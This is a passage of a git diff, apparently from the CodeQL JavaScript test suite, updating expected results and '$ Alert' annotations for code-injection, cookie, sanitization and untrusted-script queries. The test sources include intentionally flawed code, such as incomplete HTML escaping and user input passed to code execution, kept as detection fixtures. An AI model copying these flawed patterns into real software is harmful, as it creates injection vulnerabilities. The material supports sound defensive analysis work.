cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... 
ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. | express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. 
| module.js:11:17:11:30 | req.query.code | user-provided value | | react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | 
@@ -176,17 +176,17 @@ subpaths | template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... 
ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... 
on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... 
on.hash | user-provided value | | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected 
@@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... 
+ "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..db091b03406c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected 
@@ -1,8 +1,8 @@ -| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:11:9:15:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:51:9:55:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | 
@@ -12,9 +12,9 @@ | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:301:9:305:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected index 96a48fec6cb8..22b3868a62a8 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | | Missing result: Alert | +| polyfill-nocheck.html:4:9:4:98 | Content loaded from untrusted domain with no integrity check. | Unexpected result: Alert | diff --git a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected index c97e109441dd..acafaf1a7be7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected +++ b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected @@ -1,3 +1,4 @@ +#select | DynamicCreationOfUntrustedSourceUse.html:18:28:18:129 | ('https ... /ga.js' | Script loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:21:26:21:50 | 'http:/ ... e.com/' | Iframe loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:31:27:31:40 | getUrl('v123') | Iframe loaded using unencrypted connection. | @@ -5,3 +6,12 @@ | StaticCreationOfUntrustedSourceUse.html:6:9:6:56 | + {/* $ Alert[js/code-injection] */}
    ); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js index 72ea3df20038..5c31272ac5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js @@ -1,7 +1,7 @@ function badEncode(s) { return s.replace(/"/g, """) .replace(/'/g, "'") - .replace(/&/g, "&"); + .replace(/&/g, "&"); // $ Alert } function goodEncode(s) { @@ -17,7 +17,7 @@ function goodDecode(s) { } function badDecode(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/"/g, "\"") .replace(/'/g, "'"); } @@ -27,7 +27,7 @@ function cleverEncode(code) { } function badDecode2(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/s?ome|thin*g/g, "else") .replace(/'/g, "'"); } @@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) { } function badDecode3(s) { - s = s.replace(/&/g, "&"); + s = s.replace(/&/g, "&"); // $ Alert s = s.replace(/"/g, "\""); return s.replace(/'/g, "'"); } function badUnescape(s) { - return s.replace(/\\\\/g, '\\') + return s.replace(/\\\\/g, '\\') // $ Alert .replace(/\\'/g, '\'') .replace(/\\"/g, '\"'); } function badPercentEscape(s) { s = s.replace(/&/g, '%26'); - s = s.replace(/%/g, '%25'); + s = s.replace(/%/g, '%25'); // $ Alert return s; } @@ -67,7 +67,7 @@ function badEncode(s) { var indirect3 = /&/g; return s.replace(indirect1, """) .replace(indirect2, "'") - .replace(indirect3, "&"); + .replace(indirect3, "&"); // $ Alert } function badEncodeWithReplacer(s) { @@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) { "'": "'", "&": "&" }; - return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query 
diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 6f34830bf770..e18b45880bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js 
@@ -2,71 +2,71 @@ let express = require('express'); var app = express(); function bad1(s) { - return s.replace("'", ""); // $ Alert + return s.replace("'", ""); // $ Alert[js/incomplete-sanitization] } function bad2(s) { - return s.replace(/'/, ""); // $ Alert + return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization] } function bad3(s) { - return s.replace(/'/g, "\\'"); // $ Alert + return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization] } function bad4(s) { - return s.replace(/'/g, "\\$&"); // $ Alert + return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad5(s) { - return s.replace(/['"]/g, "\\$&"); // $ Alert + return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad6(s) { - return s.replace(/(['"])/g, "\\$1"); // $ Alert + return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad7(s) { - return s.replace(/('|")/g, "\\$1"); // $ Alert + return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad8(s) { - return s.replace('|', ''); // $ Alert + return s.replace('|', ''); // $ Alert[js/incomplete-sanitization] } function bad9(s) { - return s.replace(/"/g, "\\\""); // $ Alert + return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization] } function bad10(s) { - return s.replace("/", "%2F"); // $ Alert + return s.replace("/", 